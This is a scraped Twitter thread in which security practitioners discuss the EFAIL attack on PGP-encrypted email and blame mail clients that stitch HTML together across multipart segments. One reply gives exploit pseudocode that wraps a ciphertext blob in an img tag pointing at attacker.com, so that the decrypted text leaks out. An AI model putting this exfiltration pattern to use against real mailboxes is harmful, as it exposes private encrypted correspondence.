On #efail: is this really just a CBC malleability thing w/ unsigned messages? I haven't used PGP in a while; how common are encrypted but unsigned messages? Also since when do mail clients enable JavaScript on HTML messages?
-
-
Replying to @int10h
Something like(exploit pseudo code): - - multipart 1 - - <img src=“http://attacker.com/ciphertext?= - - /multipart 1 - - - - multipart 2 - - <ciphertext_blob> - - /multipart 2 - - - - multipart 3 - - “> - - /multipart 3 - -
2 replies 0 retweets 0 likes -
Replying to @f47h3r_B0 @int10h
If that's the case it's 100% the MUA being idiotic. Why would it glue together HTML across separate multipart segments? (Even if you ignore the "why would it allow external resources?" elephant in the room...)
1 reply 0 retweets 1 like -
Replying to @RichFelker @int10h
Totally agreed. String concatenation for the fail, yet again. ;) That’s why the times when I need PGP, I do it on the command line. From the paper... great stuff.pic.twitter.com/tvajjF2CZ8
2 replies 0 retweets 0 likes
I'm missing how the gpg bug is even involved. This MUA pasting bug looks exploitable without modifying the encrypted message.
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.